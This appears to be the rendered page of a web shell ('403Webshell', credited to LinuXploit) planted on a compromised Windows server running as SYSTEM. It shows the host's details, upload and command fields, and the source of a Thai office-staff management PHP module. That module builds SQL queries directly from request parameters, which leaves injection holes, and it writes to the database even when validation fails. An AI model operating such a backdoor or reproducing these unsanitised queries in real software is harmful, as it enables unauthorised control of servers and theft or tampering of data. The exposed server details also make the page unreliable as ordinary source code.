403Webshell
Server IP : 104.21.80.248  /  Your IP : 172.71.28.155
Web Server : Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
System : Windows NT WIN-ECQAAA40806 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
User : SYSTEM ( 0)
PHP Version : 5.6.30
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  E:/Inetpub/www/myoffice/2565/modules/user/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : E:/Inetpub/www/myoffice/2565/modules/user/user_raekha.php
<?
CheckUser($_SESSION['user_user'], $_SESSION['user_pwd']);
?>
<table cellspacing="0" cellpadding="0" width="100%" height=500 border="0">
        <tbody>
           <tr>
            <td align="left"Valign="top"><br />
              <b><img src="images/icon/plus.gif" border="0" align="absmiddle" /> <a href="?name=admin&file=user_la">จัดการบุคลากรผู้ปฏิบัติหน้าที่เลจานุการ</a> 
                <br />
<!-- แสดงผลรายการ -->
  <?
if($_GET[op] == "minepass_edit" AND $_GET[action] == "edit"){
	//////////////////////////////////////////// กรณีแก้ไขข้อมูลส่วนตัว
	if(CheckLevelUser($_SESSION['user_user'],$_GET[op])){
		$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
//		$res[user] = $db->select_query("SELECT * FROM ".TB_user." WHERE username='".$_SESSION['user_user']."' ");
		$res[user] = $db->select_query("SELECT * FROM ".TB_user." WHERE id='".$_GET[id]."' ");
		$arr[user] = $db->fetch($res[user]);
		$db->closedb ();

			if(!$_POST[LA] ){
				$ProcessOutput .= "<BR><BR>";
				$ProcessOutput .= "<CENTER><IMG SRC=\"images/icon/notview.gif\" BORDER=\"0\"><BR><BR>";
				$ProcessOutput .= "<FONT COLOR=\"#336600\"><B>กรุณากรอกข้อมูลต่างๆให้ครบถ้วน</B></FONT><BR><BR>";
				$ProcessOutput .= "<A HREF=\"javascript:history.go(-1);\"><B>กลับไปแก้ไข</B></A>";
				$ProcessOutput .= "</CENTER>";
				$ProcessOutput .= "<BR><BR>";
			}
				//ทำการแก้ไขข้อมูลลงดาต้าเบส
				$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
				$db->update_db(TB_user,array(
					"raekha"=>"$_POST[RAEKHA]",
					"update_date"=>"".TIMESTAMP.""						
					)," id='$_GET[id]' ");				
				$db->closedb ();
				$ProcessOutput .= "<BR><BR>";
				$ProcessOutput .= "<CENTER><A HREF=\"".$URLre."\"><IMG SRC=\"images/icon/login-welcome.gif\" BORDER=\"0\"></A><BR><BR>";
				$ProcessOutput .= "<FONT COLOR=\"#336600\"><B>ได้ทำการแก้ไขข้อมูลเรียบร้อยแล้ว</B></FONT><BR><BR>";
				$ProcessOutput .= "<meta http-equiv=\"refresh\" content=\"1 ;url=?name=user&file=raekha\">";
				$ProcessOutput .= "</CENTER>";
				$ProcessOutput .= "<BR><BR>";
		
	}else{
		//กรณีไม่ผ่าน
		$ProcessOutput = $PermissionFalse ;
	}
	echo $ProcessOutput ;
}else if($_GET[op] == ""){
$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
$limit = 30 ;
$SUMPAGE = $db->num_rows(TB_user,"id","workgroup='".$arr[user][workgroup]."' and status='1' ");
$page=$_GET[page];
if (empty($page)){
	$page=1;
}
$rt = $SUMPAGE%$limit ;
$totalpage = ($rt!=0) ? floor($SUMPAGE/$limit)+1 : floor($SUMPAGE/$limit); 
$goto = ($page-1)*$limit ;
?>

                                        <table width="100%" align="center" cellspacing="2" cellpadding="1" >
                                          <tr bgcolor="#990000" height="25">
                                           <td><div align="center"><font color="#FFFFFF"><b>ที่</b></font></div></td>
                                            <td><div align="center"><font color="#FFFFFF"><b>ชื่อ - นามสกุล</b></font></div></td>
											<td><div align="center"><font color="#FFFFFF"><b>ปฏิบัติหน้าที่</b></font></div></td>
                                            <td><div align="center"><font color="#FFFFFF"><b>สถานะ</b></font></div></td>     
											<td><div align="center"><font color="#FFFFFF"><b>จัดการ</b></font></div></td> 
                                          </tr>
 <?
//	CheckUser($_SESSION['user_user']);
		$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
		$res[user] = $db->select_query("SELECT * FROM ".TB_user." WHERE username='".$_SESSION['user_user']."' ");
		$arr[user] = $db->fetch($res[user]);
		$res[user] = $db->select_query("SELECT * FROM ".TB_user." WHERE workgroup='".$arr[user][workgroup]."' and status='1' ORDER BY level ASC LIMIT $goto, $limit ");
		$count=0;
		$i=1;
		while($arr[user] = $db->fetch($res[user])){
?>
                                          <tr>
											<td width="60" align="center"><? echo"".$i?></td>  
                                            <td width="200" ><? echo $arr[user][category_name];?></td>    
											<td align="center" width="200" >
<?
					 if($arr[user][raekha]==9){ 	  
?>
											 <font color=red>เลขานุการ</font>
<?}?>
											</td>
											<form method="post" action="?name=user&file=user_raekha&op=minepass_edit&action=edit&id=<? echo $arr[user][id];?>" enctype="multipart/form-data">
                                            <td align="center" width="400" >
<?
					 if($arr[user][raekha]==9){ 	  
?>
											<INPUT TYPE="checkbox" NAME="LA" VALUE="9" checked>เลขานุการ
<?}?>
<?
					 if($arr[user][raekha]!=9){ 	  
?>
											<INPUT TYPE="checkbox" NAME="LA" VALUE="9" >เลขานุการ
<?}?>
											</td>
                                            <td align="center" width="100"><input type="submit" value=" บันทึก " />
											</form></td>

											

                                          </tr>
<?
$i++;
 } 
?>
                                        </table>
                                                                
                                    <?
	SplitPage($page,$totalpage,"?name=user&file=user_la");
	echo $ShowSumPages ;
	echo $ShowPages ;
}

?>
                                  </td>
                                </tr>
                              </table>
			</td>
          </tr>
        </tbody>
      </table>
	 
</div>

Youez - 2016 - github.com/yon3zu
LinuXploit